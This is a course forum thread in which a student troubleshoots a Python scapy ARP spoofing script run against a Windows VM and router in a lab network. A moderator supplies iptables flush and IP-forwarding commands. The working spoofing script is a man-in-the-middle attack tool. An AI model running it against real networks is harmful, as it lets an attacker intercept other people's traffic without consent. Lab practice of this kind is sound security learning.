Tagged: 

Viewing 6 posts - 1 through 6 (of 6 total)
  • Author
    Posts
  • #44914
    AvatarNikolajevZj
    Participant

    I’m doing the arp spoof section of the course.When I run my script i manage to fool both the windows VM and the router,but even after typing the echo 1 > /proc/sys/net/ipv4/ip_forward command the windows machine doesn’t have internet access.
    Script:
    #!/usr/bin/env python
    # -*- coding: utf-8 -*-

    import scapy.all as scapy
    import time

    def title():
    print(” ___ _____ __ __ _____ “)
    print(” / _ \ / ___| / _| / | | _ |”)
    print(“/ /_\ \_ __ _ __ \ --. _ __ ___ ___ | |_| | | |/’ |”)
    print(“| _ | ‘__| ‘_ \ `–. \ ‘_ \ / _ \ / _ \| _| | | | /| |”)
    print(“| | | | | | |_) | /\__/ / |_) | (_) | (_) | | _| |_\ |_/ /”)
    print(“\_| |_/_| | .__/ \____/| .__/ \___/ \___/|_| \___(_)___/”)
    print(” | | | | “)

    def get_mac(ip):
    arp_request = scapy.ARP(pdst=ip)
    broadcast = scapy.Ether(dst=”ff:ff:ff:ff:ff:Ff”)
    arp_request_broadcast = broadcast/arp_request
    answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]

    return answered_list[0][1].hwsrc

    def spoof(target_ip, spoof_ip):
    target_mac = get_mac(target_ip)
    packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
    scapy.send(packet)

    title()
    while True:
    spoof(“10.0.2.15”, “10.0.2.1”)
    spoof(“10.0.2.1”, “10.0.2.15”)
    time.sleep(2)
    result of kali ifconfig:
    eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500

    inet 10.0.2.4 netmask 255.255.255.0 broadcast 10.0.2.255

    inet6 fe80::a00:27ff:fed5:7a16 prefixlen 64 scopeid 0x20<link>

    ether 08:00:27:d5:7a:16 txqueuelen 1000 (Ethernet)

    RX packets 5008 bytes 4040358 (3.8 MiB)

    RX errors 0 dropped 0 overruns 0 frame 0

    TX packets 4326 bytes 1807344 (1.7 MiB)

    TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

    lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536

    inet 127.0.0.1 netmask 255.0.0.0

    inet6 ::1 prefixlen 128 scopeid 0x10<host>

    loop txqueuelen 1000 (Local Loopback)

    RX packets 48 bytes 2677 (2.6 KiB)

    RX errors 0 dropped 0 overruns 0 frame 0

    TX packets 48 bytes 2677 (2.6 KiB)

    TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

    wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500

    inet 192.168.1.27 netmask 255.255.255.0 broadcast 192.168.1.255

    inet6 fe80::ab51:ec48:9d2c:390b prefixlen 64 scopeid 0x20<link>

    ether 00:c0:ca:98:9f:fb txqueuelen 1000 (Ethernet)

    RX packets 918 bytes 154601 (150.9 KiB)

    RX errors 0 dropped 101 overruns 0 frame 0

    TX packets 452 bytes 44848 (43.7 KiB)

    TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

    result of route -n:
    Kernel IP routing table

    Destination Gateway Genmask Flags Metric Ref Use Iface

    0.0.0.0 10.0.2.1 0.0.0.0 UG 100 0 0 eth0

    0.0.0.0 192.168.1.1 0.0.0.0 UG 600 0 0 wlan0

    10.0.2.0 0.0.0.0 255.255.255.0 U 100 0 0 eth0

    192.168.1.0 0.0.0.0 255.255.255.0 U 600 0 0 wlan0

    I’m honestly stuck,could someone help me?
    Also the windows and kali use the NAT network.

    #44922
    diegodiego
    Moderator

    Hi!

    Can you check that windows and kali have internet access before running the attack?
    Can you show the results of:
    ifconfig and route -n in kali
    ipconfig in windows
    Can you share a screenshot of the Network settings used in VirtualBox for both machines?

    Bur use screenshots please as the info you have shared is hard to read. And for the code use code button from the menu because I can’t read it properly as it doesn’t have any indentation.

    Thanks!
    Diego

    #44932
    AvatarNikolajevZj
    Participant
    #44961
    diegodiego
    Moderator

    Hi!
    Try by unplugging the wireless adapter, there’s no need for it. Then flush iptables rules and enable packet forwarding again:
    iptables –flush
    iptables –table nat –flush
    iptables –delete-chain
    iptables –table nat –delete-chain
    iptables -P FORWARD ACCEPT

    Enable port forwarding
    echo 1 > /proc/sys/net/ipv4/ip_forward

    Then run the attack again.

    Let me know how it goes!
    Diego

    #44968
    AvatarNikolajevZj
    Participant

    Hello!
    I managed to solve my problem.Firstly i noticed that my windowsVM had an expired license,so I recovered the first snapshot.Then i tried again and everything worked perfectly.I also stopped the program before the execution of echo command.I don’t know if those two properties were the actual problem,or if it was some network issue
    that didn’t occur further,anyway it works know.Thanks for the iptables commands, I think they might be useful if I encounter similar problems.
    Best regards!

    #44998
    diegodiego
    Moderator

    Hi!
    Cool you got it!
    Diego

Viewing 6 posts - 1 through 6 (of 6 total)
  • You must be logged in to reply to this topic.